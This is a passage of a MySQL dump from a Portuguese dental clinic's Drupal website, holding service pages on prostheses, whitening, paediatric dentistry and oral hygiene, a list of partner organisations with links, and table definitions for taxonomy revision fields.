INSERT INTO `taxonomy_term_field_revision` VALUES (1,1,'pt-pt',1,'Implantologia','<p class=\"text-align-justify\">A&nbsp;<strong>prótese dentária</strong>&nbsp;consiste na&nbsp;reposição e reconstituição de tecidos bucais e dentes perdidos, com o objectivo de restaurar e manter a forma, função, aparência e saúde da nossa boca.</p>\r\n\r\n<p class=\"text-align-justify\">A \"prótese dentária\" &nbsp;é também utilizada para substituir a função original de dentes que por degradação ou acidente se tenham&nbsp;perdido.</p>\r\n\r\n<p class=\"text-align-justify\">Recentemente encontramos no mercado próteses modernas produzidas sobre implantes como overdentures, próteses fixas livres de metal (metalfree) e próteses protocolo.</p>\r\n\r\n<p class=\"text-align-justify\">Na Clínica Dentária do Castelo somos especializada em reparações. Prestamos vários tratamentos dentários,&nbsp;usando os materiais e equipamentos mais recentes e as mais inovadoras técnicas de ortodontia.</p>\r\n\r\n<p class=\"text-align-justify\">O nosso objectivo é esclarecer os nossos cliente de todas as dúvidas que surgem quando se pensa ou se tem a necessidade de colocar implantes dentários ou próteses dentárias. Garantimos um serviço de acompanhamento especializado e cuidado.</p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<p class=\"text-align-center\"><img alt=\".\" data-entity-type=\"file\" data-entity-uuid=\"34fb0cea-8382-4b12-b63f-bcc54bebb3ca\" height=\"404\" src=\"/clidentcastelo/public/sites/default/files/inline-images/3ca955aa-8574-4d7c-9103-75d84a267918_LARGE.jpg\" width=\"541\" />&nbsp; &nbsp; &nbsp;&nbsp;<img alt=\".\" data-entity-type=\"file\" data-entity-uuid=\"ae080749-d4cf-472b-b788-bc6de331d5c2\" height=\"406\" src=\"/clidentcastelo/public/sites/default/files/inline-images/b4c63ac9-a015-4156-83f4-a55843b21819_LARGE.jpg\" width=\"543\" />&nbsp; &nbsp; &nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h2>&nbsp;</h2>\r\n\r\n<hr />\r\n<h2><strong><span>As nossas próteses</span></strong></h2>\r\n\r\n<h3 class=\"text-align-center\">Próteses Dentárias Removíveis</h3>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242433\"></a></p>\r\n\r\n<p class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903068\" width=\"900\"></iframe></p>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242435\"></a></p>\r\n\r\n<p class=\"text-align-center\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-center\">Próteses Dentárias Fixas - Implantes Inclinados</h3>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242436\"></a></p>\r\n\r\n<p class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903071\" width=\"900\"></iframe></p>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242438\"></a></p>\r\n\r\n<p class=\"text-align-center\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-center\">Próteses Dentárias novo Tratamento</h3>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242439\"></a></p>\r\n\r\n<p class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903070\" width=\"900\"></iframe></p>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242415\"></a></p>\r\n\r\n<p class=\"text-align-center\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-center\">Novo Sistema de Fixação de Próteses Dentárias</h3>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242416\"></a></p>\r\n\r\n<p class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903073\" width=\"900\"></iframe></p>\r\n\r\n<p class=\"text-align-center\"><a name=\"m2242418\"></a></p>\r\n\r\n<p class=\"text-align-center\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-center\">Próteses Dentárias Removíveis com Barra</h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242419\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903074\" width=\"900\"></iframe></h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242421\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\">&nbsp;</h3>\r\n\r\n<h3 class=\"text-align-center\">Próteses Dentárias Fixas Implantes Retos</h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242422\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903066\" width=\"900\"></iframe></h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242424\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\">&nbsp;</h3>\r\n\r\n<h3 class=\"text-align-center\">Sistema único de Fixação Dentária</h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242425\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\"><iframe allowtransparency=\"true\" frameborder=\"0\" height=\"360\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" src=\"http://www.pai.pt/ms/widgets.html?siteId=71612&amp;customerId=87350378&amp;moduleId=50903065\" width=\"900\"></iframe></h3>\r\n\r\n<h3 class=\"text-align-center\"><a name=\"m2242440\"></a></h3>\r\n\r\n<h3 class=\"text-align-center\">&nbsp;</h3>\r\n','full_html',1579626211,1,1),(2,2,'pt-pt',1,'Branqueamento dentário','<p class=\"text-align-justify\">Em geral, qualquer pessoa, com idade superior a 18 anos,&nbsp;pode efetuar um branqueamento dentário e sempre que se verifique um bom estado de saúde oral. Caso existam alguns problemas dentários tais como&nbsp;cáries, desgastes, sensibilidade dentária ou&nbsp;outros, pode haver a necessidade de os tratar previamente.&nbsp;Deve, por isso, consultar o seu médico dentista, para em conjunto avaliarem o momento certo para realizar o branqueamento dentário.</p>\r\n\r\n<p class=\"text-align-justify\">É fundamental que, independentemente da técnica a utilizar,&nbsp;este procedimento seja efetuado pelo seu médico dentista,&nbsp;sempre com base na melhor relação eficácia/segurança.<br />\r\n&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<p class=\"text-align-center\"><iframe allow=\";\" allowfullscreen=\"\" frameborder=\"0\" height=\"360\" src=\"https://www.youtube.com/embed/VrlO--UypVQ\" width=\"640\"></iframe></p>\r\n\r\n<p class=\"text-align-center\">&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\">Este procedimento pode causar alguns&nbsp;efeitos secundários, quer a nível dentário quer&nbsp;a nível das gengivas, devido à&nbsp;concentração dos&nbsp;produtos, a forma como são aplicados e as condições de cada paciente. O que ocorre com mais frequência&nbsp;são a sensibilidade dentária e&nbsp;desconforto gengival que normalmente desaparece com a&nbsp;interrupção do tratamento.&nbsp;O seu médico dentista&nbsp;pode prevenir e controlar clinicamente estas condições.</p>\r\n\r\n<p class=\"text-align-justify\">Nos casos em que os pacientes&nbsp;possuam restaurações estéticas e próteses dentárias poderão ter a necessidade de substituir ou reparar as mesmas no final do tratamento de branqueamento, de modo a ajustar a cor e garantir a&nbsp;integridade das restaurações dentárias, visto&nbsp;que os produtos&nbsp;de branqueamento não atuam na cor dos materiais que as compõem.</p>\r\n\r\n<p class=\"text-align-justify\">Este tratamento, sempre&nbsp;supervisionado&nbsp;pelo médico dentista, pode&nbsp;ser realizado&nbsp;de duas formas. Por um lado pode ser&nbsp;aplicado o material branqueador em casa (“tratamento ambulatório”), utilizando&nbsp;geralmente os produtos de menor<br />\r\nconcentração, por períodos variáveis (desde 1 a 8 horas diárias), durante vários dias ou semanas ou, por outro lado, pode optar pela&nbsp;aplicação no consultório, com o auxílio de luzes.&nbsp;O que exerce um efeito branqueador são os produtos químicos&nbsp;aplicados em simultâneo. As luzes são usadas como forma de&nbsp;acelerar a reação química dos produtos, na tentativa de tornar o&nbsp;processo de branqueamento mais rápido.</p>\r\n\r\n<p class=\"text-align-justify\">Se tiver alguma&nbsp;dúvida&nbsp;acerca do tratamento que vai efetuar não tenha não hesite em entrar em contacto connosco ou colocar as suas questões durante a sua consulta.</p>\r\n\r\n<p class=\"text-align-justify\"><br />\r\n&nbsp;</p>\r\n','full_html',1579198070,1,1),(3,3,'pt-pt',1,'Próteses Fixas','<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\">A prótese fixa é a uma boa solução nos casos em que faltam poucos dentes, tanto pelo conforto como pela estética.&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\"><span><span><span>As próteses fixas, que podem ser coroas ou pontes, têm como objetivo criar soluções que se aproximem o mais possível à nossa dentição natural, sendo indicadas para</span></span></span>:</p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<ul>\r\n	<li class=\"text-align-justify\">Substituir uma restauração quando existe pouca&nbsp;estrutura do dente natural</li>\r\n	<li class=\"text-align-justify\">Proteger um dente enfraquecido&nbsp;</li>\r\n	<li class=\"text-align-justify\">Aumentar a retenção e suporte de uma prótese removível esquelética</li>\r\n	<li class=\"text-align-justify\">Recobrir um dente com alteração da cor ou forma</li>\r\n	<li class=\"text-align-justify\">Proteger dentes desvitalizados em que a estrutura dentária remanescente está fragilizada</li>\r\n	<li class=\"text-align-justify\">Substituir um dente perdido, colocando-as sobre implantes dentários</li>\r\n</ul>\r\n\r\n<p class=\"text-align-justify\"><span><span><span>Uma prótese fixa consiste na restauração total ou parcial da coroa de um dente através de uma prótese que é colocada sobre o dente natural previamente preparado para o efeito ou sobre implantes dentários, não podendo ser removida pelo paciente. </span></span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span><span>A prótese fixa é a uma boa solução nos casos em que faltam poucos dentes, tanto pelo conforto como pela estética.</span></span></span></p>\r\n\r\n<h3 class=\"text-align-justify\"><span><span><span>Coroa ou Ponte</span></span></span></h3>\r\n\r\n<p class=\"text-align-justify\"><span><span><span>As coroas são indicadas nos casos em que é necessário conferir maior resistência e durabilidade a dentes danificados, mas também, em casos em que o objectivo é melhorar esteticamente o formato e alinhamento dos dentes. Uma coroa pode ainda ser colocada sobre um implante dentário no caso de um dente perdido.</span></span></span></p>\r\n\r\n<p class=\"text-align-justify\">As pontes são aconselhadas em casos em que é necessário substituir um ou mais dentes ausentes e são, no fundo,&nbsp;uma sequência de coroas, todas unidas.</p>\r\n\r\n<p class=\"text-align-justify\"><o:p></o:p></p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\">Estes tratamentos de reabilitação fixa têm uma período de duração variável, podendo chegar a vários meses. Dependendo da extensão do tratamento, poderão ser necessárias várias consultas, para além do tempo necessário à execução das próteses num laboratório especializado.</p>\r\n\r\n<p class=\"text-align-justify\"><br />\r\nPara garantir a durabilidade das próteses fixas é fundamental manter uma boa higiene dentária, tal como com a dentição natural, e visitar regularmente o dentista para controlo e limpeza.</p>\r\n','full_html',1579626099,1,1),(4,4,'pt-pt',1,'Ortodontia',NULL,NULL,1565602752,1,1),(5,5,'pt-pt',1,'Odontopediatria','<p class=\"text-align-justify\"><span><span>A criança, enquanto ser único, depende física e emocionalmente de um adulto, apresentando etapas decisivas de desenvolvimento psicomotor, assim como particularidades anatómicas, fisiológicas e comportamentais. Desta forma, as patologias sistémicas e orais merecem uma abordagem distinta da de um adulto. Neste sentido, surge a odontopediatria, a área da Medicina Dentária que se dedica à saúde oral de bebés, crianças e adolescentes (0-17 anos), onde se pressupõe a intervenção precoce e terapêutica, através da realização de tratamentos preventivos e curativos, para que a criança mantenha uma boca sã, estética e funcional, até à idade adulta.</span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>É de extrema importância que os dentes de leite se mantenham tratados e livres de focos de infeção tal como os dentes definitivos, pois alguns mantêm-se em boca até aos 12 anos e são fundamentais para o normal desenvolvimento da mastigação, deglutição, fonética, estética e respiração, assim como na manutenção do espaço para os definitivos que depois o ocuparão.</span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>Os objetivos da consulta de odontopediatria são vários:</span></span></p>\r\n\r\n<ul>\r\n	<li class=\"text-align-justify\"><span><span>prevenção: realizar o exame oral e diagnóstico precoces e fornecer orientações aos pais;</span></span></li>\r\n	<li class=\"text-align-justify\"><span><span>instrução e motivação para correta alimentação e higiene oral;</span></span></li>\r\n	<li class=\"text-align-justify\"><span><span>realização de aplicações tópicas de flúor: permite a remineralização do esmalte, ajudando a prevenir o aparecimento de cárie ou a mantê-la inativa;</span></span></li>\r\n	<li class=\"text-align-justify\"><span><span>realização de tratamentos preventivos: visam evitar o aparecimento de lesões dentárias e de desenvolvimento orofacial (ex.: selantes de fissura);</span></span></li>\r\n	<li class=\"text-align-justify\"><span><span>realização de tratamentos curativos: visam tratar lesões dentárias já existentes (ex.: tratamento de cárie em dentição decídua e mista, exodontia de dentes de leite);</span></span></li>\r\n	<li class=\"text-align-justify\"><span><span>realizar tratamentos intercetivos: visam reduzir a severidade ou mesmo eliminar hábitos nocivos, que causam problemas na saúde oral e desenvolvimento facial, através do trabalho em conjunto com a terapia da fala e ortodontia (ex.: extrações dentárias programadas, eliminar contactos prematuros);</span></span></li>\r\n</ul>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-justify\"><strong><span><span>Consulta no Bebé</span></span></strong></h3>\r\n\r\n<p class=\"text-align-justify\"><span><span>É frequente os pais perguntarem qual é a idade em que se deve ter a primeira consulta de Medicina Dentária. A resposta é a partir do momento em que surge o primeiro dente na cavidade oral, por volta dos 6 meses de vida. Sendo assim, o bebé já pode ir ao dentista, de forma a que se possa fazer aconselhamento sobre alimentação, higiene oral e flúor, dar indicações acerca dos efeitos nocivos que a chupeta e o biberão poderão trazer para os seus dentinhos e crescimento orofacial, assim como informar qual o tipo de pasta, escova e técnica de escovagem adequados e sensibilizar para a deteção de “lesões de mancha branca”. É uma consulta essencialmente preventiva, cujo principal objetivo é observar e alertar os pais para atitudes preventivas e onde os mais pequenos podem ter um contacto precoce com os instrumentos e o ambiente do consultório de Medicina Dentária. </span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>Convém referir, ainda, que a gengiva do bebé também deve ser higienizada pelos pais, através do auxílio de uma compressa humedecida com soro ou água. A pasta de dentes, tal como o próprio nome indica, só deverá ser utilizada a partir do momento em que aparece o 1º dente.</span></span></p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-justify\"><strong><span><span>Consulta na criança</span></span></strong></h3>\r\n\r\n<p class=\"text-align-justify\"><span><span>A dentição de leite ou decídua é composta por 20 dentes e fica completa por volta dos 2 anos e meio de idade e é importante que a criança comece a ter hábitos de higiene oral e consultas regulares no dentista, pois, se há dentes na boca, significa que pode haver formação de cárie nos mesmos.</span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>Se a primeira consulta se der quando há dor ou cárie, conquistar a confiança da criança é mais complicado, daí a importância de que a primeira consulta deve ser encarada como uma experiência positiva com os instrumentos dentários, como rotina e prevenção, ao invés da ida pela preocupação do facto de a criança andar com queixas de dor nos dentes ou porque apareceu uma “borbulhinha” no dente que tem um buraco preto. Neste caso, a primeira consulta ao invés de ser uma consulta preventiva, passa a ser uma experiência um pouco mais temida e invasiva. É também muito importante que a criança, em casa, mantenha bons e regulares hábitos de higiene oral e que o faça em conjunto com os pais, pois estes são encarados por elas como “super-heróis”, o seu principal exemplo, e gostam de fazer tudo o que os seus pais fazem. Também é muito importante que a criança não traga uma ideia pré-concebida acerca do dentista, por conversas que escutou, mas sim deixá-la ter a sua própria experiência, pois o médico dentista saberá qual a melhor forma de o abordar, fazendo tudo parecer mais simples.</span></span></p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<h3 class=\"text-align-justify\"><strong><span><span>Consulta no adolescente</span></span></strong></h3>\r\n\r\n<p class=\"text-align-justify\"><span><span>Entre os 5-6 anos aparecem os primeiros molares definitivos, atrás dos molares de leite, sem queda de nenhum dente permanente (pode passar despercebido), iniciando a fase de dentição mista, isto é, há presença simultânea de dentes de leite e de dentes definitivos na cavidade oral.&nbsp; Por volta dos 14 anos, a dentição definitiva fica completa, ou seja, todos os dentes de leite foram expulsos e só existem dentes definitivos (à exceção dos dentes do siso), que devem ser mantidos saudáveis até ao final da vida.</span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>É importante fazer consultas regulares de controlo, profilaxia e aplicações tópicas de flúor, tratamentos curativos na fase mais precoce possível, avaliar a necessidade de auxiliar a expulsão dos dentes de leite (pois nem sempre conseguem sair por eles próprios), de realizar os selantes de fissura e, também, de avaliar o crescimento facial e a orientação dentária, de forma a observar se haverá necessidade de utilizar aparelho ortodôntico.</span></span></p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n\r\n<p class=\"text-align-justify\"><span><span>É importante relembrar que um dente de leite com cárie é um foco infecioso e pode afetar a formação dos dentes definitivos e a saúde em geral.</span></span></p>\r\n\r\n<p class=\"text-align-justify\"><span><span>Se a criança começar a ser seguida numa idade muito precoce, consegue manter estes hábitos durante toda a sua vida, pois adquire-os como seus e tudo se tornará mais fácil!</span></span></p>\r\n\r\n<p class=\"text-align-justify\">&nbsp;</p>\r\n','full_html',1579198070,1,1),(6,6,'pt-pt',1,'Restaurações Estéticas',NULL,NULL,1579198070,1,1),(7,7,'pt-pt',1,'Higiene oral','<p>A higiene oral é um dos principais cuidados a ter para uma boa saúde oral.<br />\r\nEstes cuidados devem iniciar-se desde a infância ou até mesmo antes, com conselhos pré-natais transmitidos aos pais, isto porque é fundamental que acção se baseie numa educação preventiva.</p>\r\n\r\n<h3><br />\r\nComo escovar os dentes</h3>\r\n\r\n<p>Deve&nbsp;lavar os dentes 3 vezes ao dia, durante&nbsp;pelo menos 2 minutos, depois das refeições e ao deitar.</p>\r\n\r\n<p>A escolha da escova mais indicada também é importante, aconselhe-se com o seu dentista, não esquecendo que esta deve ser trocada de 3 em 3 meses.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p><iframe allow=\";\" allowfullscreen=\"\" frameborder=\"0\" height=\"360\" src=\"https://www.youtube.com/embed/Ot2Cwtqwht0\" width=\"640\"></iframe></p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n','full_html',1580485541,1,1),(8,8,'pt-pt',1,'Sporting Clube de Braga',NULL,NULL,1565972485,1,1),(9,9,'pt-pt',1,'Serviço Médico Permanente SMP',NULL,NULL,1565972485,1,1),(10,10,'pt-pt',1,'Sindicato dos Trabalhadores das Indústrias Transformadoras, Energia e Actividades do Ambiente do Norte – SITE NORTE',NULL,NULL,1571823909,1,1),(11,11,'pt-pt',1,'Sindicato dos Trabalhadores do Comércio, Escritórios e Serviços do Minho - Cesminho',NULL,NULL,1571823972,1,1),(12,12,'pt-pt',1,'Associação Mutualista Montepio',NULL,NULL,1565972342,1,1),(13,13,'pt-pt',1,'DentyRed',NULL,NULL,1565972485,1,1),(14,14,'pt-pt',1,'Federação Nacional de Professores - Sindicato de Professores do Norte',NULL,NULL,1571821042,1,1),(15,15,'pt-pt',1,'Clube Recreativo do Pessoal dos TUB',NULL,NULL,1565972485,1,1),(16,16,'pt-pt',1,'Cheque dentista',NULL,NULL,1565972485,1,1),(18,18,'pt-pt',1,'Medicare',NULL,NULL,1565972485,1,1),(19,19,'pt-pt',1,'Liga dos Combatentes',NULL,NULL,1565972928,1,1),(20,20,'pt-pt',1,'Automóvel Club de Portugal',NULL,NULL,1565972485,1,1),(21,21,'pt-pt',1,'Próteses Removíveis',NULL,NULL,1579256185,1,1);

--
-- Table structure for table `taxonomy_term_revision`
--

CREATE TABLE `taxonomy_term_revision` (
  `tid` int(10) unsigned NOT NULL,
  `revision_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL,
  `revision_user` int(10) unsigned DEFAULT NULL COMMENT 'The ID of the target entity.',
  `revision_created` int(11) DEFAULT NULL,
  `revision_log_message` longtext,
  `revision_default` tinyint(4) DEFAULT NULL,
  PRIMARY KEY (`revision_id`),
  KEY `taxonomy_term__tid` (`tid`),
  KEY `taxonomy_term_field__revision_user__target_id` (`revision_user`)
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8mb4 COMMENT='The revision table for taxonomy_term entities.';

--
-- Dumping data for table `taxonomy_term_revision`
--

INSERT INTO `taxonomy_term_revision` VALUES (1,1,'pt-pt',NULL,1558539551,NULL,1),(2,2,'pt-pt',NULL,1558539556,NULL,1),(3,3,'pt-pt',NULL,1563233064,NULL,1),(4,4,'pt-pt',NULL,1563233138,NULL,1),(5,5,'pt-pt',NULL,1563233347,NULL,1),(6,6,'pt-pt',NULL,1563233489,NULL,1),(7,7,'pt-pt',NULL,1563233557,NULL,1),(8,8,'pt-pt',NULL,1563301016,NULL,1),(9,9,'pt-pt',NULL,1563301067,NULL,1),(10,10,'pt-pt',NULL,1563301084,NULL,1),(11,11,'pt-pt',NULL,1563301165,NULL,1),(12,12,'pt-pt',NULL,1563301220,NULL,1),(13,13,'pt-pt',NULL,1563301296,NULL,1),(14,14,'pt-pt',NULL,1563301380,NULL,1),(15,15,'pt-pt',NULL,1563301530,NULL,1),(16,16,'pt-pt',NULL,1563301548,NULL,1),(18,18,'pt-pt',NULL,1565971377,NULL,1),(19,19,'pt-pt',NULL,1565971989,NULL,1),(20,20,'pt-pt',NULL,1565972106,NULL,1),(21,21,'pt-pt',NULL,1579198005,NULL,1);

--
-- Table structure for table `taxonomy_term_revision__field_icon_servico`
--

CREATE TABLE `taxonomy_term_revision__field_icon_servico` (
  `bundle` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_icon_servico_target_id` int(10) unsigned NOT NULL COMMENT 'The ID of the file entity.',
  `field_icon_servico_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_icon_servico_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_icon_servico_width` int(10) unsigned DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_icon_servico_height` int(10) unsigned DEFAULT NULL COMMENT 'The height of the image in pixels.',
  PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  KEY `bundle` (`bundle`),
  KEY `revision_id` (`revision_id`),
  KEY `field_icon_servico_target_id` (`field_icon_servico_target_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Revision archive storage for taxonomy_term field field_icon…';

--
-- Dumping data for table `taxonomy_term_revision__field_icon_servico`
--

INSERT INTO `taxonomy_term_revision__field_icon_servico` VALUES ('servicos',0,1,1,'pt-pt',0,22,'','',512,512),('servicos',0,2,2,'pt-pt',0,21,'','',512,512),('servicos',0,3,3,'pt-pt',0,23,'','',512,512),('servicos',0,4,4,'pt-pt',0,24,'','',512,512),('servicos',0,5,5,'pt-pt',0,28,'','',512,512),('servicos',0,6,6,'pt-pt',0,25,'','',512,512),('servicos',0,7,7,'pt-pt',0,27,'','',512,512),('servicos',0,21,21,'pt-pt',0,109,'','',100,100);

--
-- Table structure for table `taxonomy_term_revision__field_ligacao`
--

CREATE TABLE `taxonomy_term_revision__field_ligacao` (
  `bundle` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_ligacao_uri` varchar(2048) DEFAULT NULL COMMENT 'The URI of the link.',
  `field_ligacao_title` varchar(255) DEFAULT NULL COMMENT 'The link text.',
  `field_ligacao_options` longblob COMMENT 'Serialized array of options for the link.',
  PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  KEY `bundle` (`bundle`),
  KEY `revision_id` (`revision_id`),
  KEY `field_ligacao_uri` (`field_ligacao_uri`(30))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Revision archive storage for taxonomy_term field field…';

--
-- Dumping data for table `taxonomy_term_revision__field_ligacao`
--

INSERT INTO `taxonomy_term_revision__field_ligacao` VALUES ('parcerias',0,8,8,'pt-pt',0,'https://scbraga.pt/','',_binary 'a:0:{}'),('parcerias',0,9,9,'pt-pt',0,'http://www.smpsaude.pt/','',_binary 'a:0:{}'),('parcerias',0,10,10,'pt-pt',0,'http://www.cgtp.pt/contactos/234-porto/79-sindicato-dos-trab-das-industrias-transformadoras-energia-e-actividades-do-ambiente-do-norte-site-norte','',_binary 'a:0:{}'),('parcerias',0,11,11,'pt-pt',0,'http://sindicatodostrabalhadores.pt','',_binary 'a:0:{}'),('parcerias',0,12,12,'pt-pt',0,'https://www.montepio.org/','',_binary 'a:0:{}'),('parcerias',0,13,13,'pt-pt',0,'https://www.dentycard.es/WEB/pt/Dentyred','',_binary 'a:0:{}'),('parcerias',0,14,14,'pt-pt',0,'https://www.fenprof.pt/','',_binary 'a:0:{}'),('parcerias',0,15,15,'pt-pt',0,'http://crpt-tub.pt/','',_binary 'a:0:{}'),('parcerias',0,16,16,'pt-pt',0,'https://www.sns24.gov.pt/servico/boletim-de-saude-oral/','',_binary 'a:0:{}'),('parcerias',0,18,18,'pt-pt',0,'https://www.medicare.pt/','',_binary 'a:0:{}'),('parcerias',0,19,19,'pt-pt',0,'http://www.ligacombatentes.org.pt/nucleos/mais/13','',_binary 'a:0:{}'),('parcerias',0,20,20,'pt-pt',0,'https://www.acp.pt/Inicio','',_binary 'a:0:{}');

--
-- Table structure for table `taxonomy_term_revision__field_logotipo`
--

CREATE TABLE `taxonomy_term_revision__field_logotipo` (
  `bundle` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_logotipo_target_id` int(10) unsigned NOT NULL COMMENT 'The ID of the file entity.',
  `field_logotipo_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_logotipo_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_logotipo_width` int(10) unsigned DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_logotipo_height` int(10) unsigned DEFAULT NULL COMMENT 'The height of the image in pixels.',
  PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  KEY `bundle` (`bundle`),
  KEY `revision_id` (`revision_id`),
  KEY `field_logotipo_target_id` (`field_logotipo_target_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Revision archive storage for taxonomy_term field field…';

--
-- Dumping data for table `taxonomy_term_revision__field_logotipo`
--

